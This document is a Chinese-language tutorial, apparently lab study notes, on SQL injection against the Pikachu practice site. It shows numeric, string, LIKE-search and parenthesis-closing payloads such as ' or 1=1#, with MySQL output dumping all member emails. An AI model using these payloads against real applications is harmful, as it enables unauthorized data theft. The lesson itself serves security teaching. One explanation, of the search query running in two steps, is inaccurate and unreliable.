安全之数据库 select注入2

注入原理2

web页面常见的sql查询语句可以更改语句的判断条件，使之返回全部的字段数据。 
select username,email from member where id=1 or 1=1;  
# 通过添加多个条件判断条件，返回整个字段的数据。

数字型注入

开发代码： select username,email from member where id=$id

sql代码：
mysql> select username,email from member where id=1;
+----------+-------------------+
| username | email             |
+----------+-------------------+
| vince    | vince@pikachu.com |
+----------+-------------------+
1 row in set (0.02 sec)


mysql> select username,email from member where id=1 or 1=1;
+----------+-------------------+
| username | email             |
+----------+-------------------+
| vince    | vince@pikachu.com |
| allen    | allen@pikachu.com |
| kobe     | kobe@pikachu.com  |
| grady    | grady@pikachu.com |
| kevin    | kevin@pikachu.com |
| lucy     | lucy@pikachu.com  |
| lili     | lili@pikachu.com  |
+----------+-------------------+
7 rows in set (0.03 sec)


如何更改select语句获取到更多的数据？
数字不需要加引号，直接拼接sql

字符串型的注入

开发代码： select id,email from member where username='$name'

sql代码：
mysql> select id,email from member where username='123' or 1=1;
+----+-------------------+
| id | email             |
+----+-------------------+
|  1 | vince@pikachu.com |
|  2 | allen@pikachu.com |
|  3 | kobe@pikachu.com  |
|  4 | grady@pikachu.com |
|  5 | kevin@pikachu.com |
|  6 | lucy@pikachu.com  |
|  7 | lili@pikachu.com  |
+----+-------------------+
7 rows in set (0.05 sec)

如何更改select语句获取到更多的数据？
form表单的值 = 输入的字符串 = $name ,注意不包括‘’  两个引号的符号
select id,email from member where username='$name'

所以要想让sql语法被识别，必然要考虑引号闭合的问题。
'123' or 1=1  必须要等于 $name

123' or 1=1# 填入form表单 就能变形成完整的sql语句。
select id,email from member where username='$name'
select id,email from member where username='123' or 1=1#'

搜索型注入

开发代码：  select username,id,email from member where username like '%$name%'

sql代码：
mysql> select username,id,email from member where username like '%123%' or 1=1;
+----------+----+-------------------+
| username | id | email             |
+----------+----+-------------------+
| vince    |  1 | vince@pikachu.com |
| allen    |  2 | allen@pikachu.com |
| kobe     |  3 | kobe@pikachu.com  |
| grady    |  4 | grady@pikachu.com |
| kevin    |  5 | kevin@pikachu.com |
| lucy     |  6 | lucy@pikachu.com  |
| lili     |  7 | lili@pikachu.com  |
+----------+----+-------------------+
7 rows in set (0.04 sec)


如何更改select语句获取到更多的数据？

like  匹配类型  从开发代码中我们发现，采用的是 %% 两个百分号包围匹配数据。

如何变形？
输入的 value = 123%' or 1=1#  ，形成闭合
'%$name%' 变成了 '%123%' or 1=1#%'
select username,id,email from member where username like '%123%' or 1=1;

select 语句教给sql解释器，分两步执行 
select username,id,email from member where username like  '%123%'
select username,id,email from member where username like 1=1  

xx型注入

开发代码： select id,email from member where username=('$name')

mysql> select id,email from member where username=('lili');
+----+------------------+
| id | email            |
+----+------------------+
|  7 | lili@pikachu.com |
+----+------------------+
1 row in set (0.04 sec)

mysql 对于（） 不做处理，有或者没有都可以。
mysql> select id,email from member where username='lili';
+----+------------------+
| id | email            |
+----+------------------+
|  7 | lili@pikachu.com |
+----+------------------+
1 row in set (0.05 sec)


如何更改select语句获取到更多的数据？
填写:  lili') or 1=1
    
把后端代码的sql 闭合，就能执行。
mysql> select id,email from member where username=('lili') or 1=1;
+----+-------------------+
| id | email             |
+----+-------------------+
|  1 | vince@pikachu.com |
|  2 | allen@pikachu.com |
|  3 | kobe@pikachu.com  |
|  4 | grady@pikachu.com |
|  5 | kevin@pikachu.com |
|  6 | lucy@pikachu.com  |
|  7 | lili@pikachu.com  |
+----+-------------------+
7 rows in set (0.04 sec)

注入提交的方式分类

options请求,

OPTIONS  返回网站后台能接受请求

GET请求

需要对地址栏进行编码

POST请求

post请求注入 是不需要转码的